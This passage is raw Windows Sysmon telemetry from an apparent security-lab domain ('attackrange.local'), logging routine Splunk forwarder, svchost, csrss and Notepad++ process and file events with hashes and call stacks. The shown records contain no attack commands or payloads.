Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807825Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.944{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DEB8C56991C6BADFCBF8FAB29212A23,SHA256=4563341272B051A48BB75ACB0339A38E7FAD70697A5D62AA81790CCC2F6CEB8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.794{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2272FD853DB75FA302671E52F54ABD93,SHA256=074A0ED53E6449C699F179AAB60CF35B073E01DE9D0C4F94178E9CAEA18DC6B0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.632{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.632{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.493{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.493{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:28.493{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.493{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:28.493{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F4F8-60EB-447D-00000000CF01}9232C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.493{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F4F8-60EB-447D-00000000CF01}9232C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Notepad++\NppShell_06.dll+4449|C:\Program Files\Notepad++\NppShell_06.dll+46a6|C:\Windows\System32\SHELL32.dll+80337|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0|C:\Windows\System32\SHELL32.dll+16ad2e|C:\Windows\System32\SHELL32.dll+737a1|C:\Windows\System32\SHELL32.dll+76686|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 154100x80000000000000001049299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.483{466BC892-F4F8-60EB-447D-00000000CF01}9232C:\Program Files\Notepad++\notepad++.exe8.11Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\Program 
Files\ansible\AttackRangeSysmon.xml"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=3433991765511375D3EC11B4FE290298,SHA256=B30DDA913768A864106485E51682E90286D320023221F5676A42CC9B914A11F8,IMPHASH=B65402F137E08F6E43CEEF2CF25E0CC2{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 10341000x8000000000000000807824Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.381{0C1E0330-F4F8-60EB-8079-00000000D001}36763068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807823Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.350{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C138494E9639A44C88074A577450A7A,SHA256=754029B72BE6C96C62D2F58FFFECD511BF33CFF904FA247032F6B83E285CC051,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807822Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4F8-60EB-8079-00000000D001}3676C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807821Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807820Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807819Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807818Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807817Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807816Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807815Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807814Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:28.256{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F4F8-60EB-8079-00000000D001}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807813Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807812Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807811Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4F8-60EB-8079-00000000D001}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807810Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.241{0C1E0330-F4F8-60EB-8079-00000000D001}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807827Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:29.990{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF40D7B6A036DBA52DCA51B367A88FFA,SHA256=B5619B4531021664CA14E83A1E6607AB691335BB5FFE69387E21BF2880A15AEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:29.795{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF6A7A0CDD11F4A00C7B7310DB594CEF,SHA256=F9D6EECE334858C59516E929532ED037CACF489B2DB4C4166CAC1B2409FECAEA,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807826Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:29.319{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D4BE4E81581C1BDA861B731906A098BD,SHA256=BF025D1AC98817D9331245637430081F7AF839932139E4482F608E6A649A9B31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:29.495{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0EEEE864BF3E251A4C7EE1FF5B035DB9,SHA256=6982675ACB408A9A8819C0AFC82D8B192159777C8B7196080A398A058D8CDB60,IMPHASH=00000000000000000000000000000000falsetrue 